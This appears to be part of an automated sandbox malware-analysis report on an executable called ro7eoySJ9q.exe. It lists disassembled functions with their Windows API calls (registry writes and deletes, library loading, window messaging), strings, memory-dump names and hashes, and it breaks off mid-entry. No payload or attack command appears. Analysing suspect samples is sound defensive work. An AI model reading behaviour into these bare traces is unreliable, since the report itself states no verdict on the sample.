Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Strings

C:\Program Files (x86)\edelweissen\romanblade.ini, xrefs: 0040237E, 0040238C, 004023A3, 004023B3, 004023BE

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
API String ID: 1356686001-3814320704
Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68

Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
RegCloseKey.ADVAPI32(?), ref: 00402B76
RegCloseKey.ADVAPI32(?), ref: 00402B9B
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38

Function 004047DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
wsprintfW.USER32 ref: 00404878
SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B

Strings

%u.%u%s%s, xrefs: 00404859

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58

Function 00401F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3

Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051

Strings

OC, xrefs: 00402011

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: OC
API String ID: 334405425-1597561874
Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D

Function 004057AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004057B4
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004057BE
lstrcatW.KERNEL32(?,0040A014), ref: 004057D0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD

Function 00402C9B Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
GetTickCount.KERNEL32 ref: 00402CCC
CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC

Function 00404F6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F9D
CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE

Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3

Strings

, xrefs: 00404F7E

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669

Function 00403685 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,0040365D,0040349F,?), ref: 0040369F
GlobalFree.KERNEL32(?), ref: 004036A6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403697

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8

Function 004057FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810

Strings

C:\Users\user\Desktop, xrefs: 004057FA

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

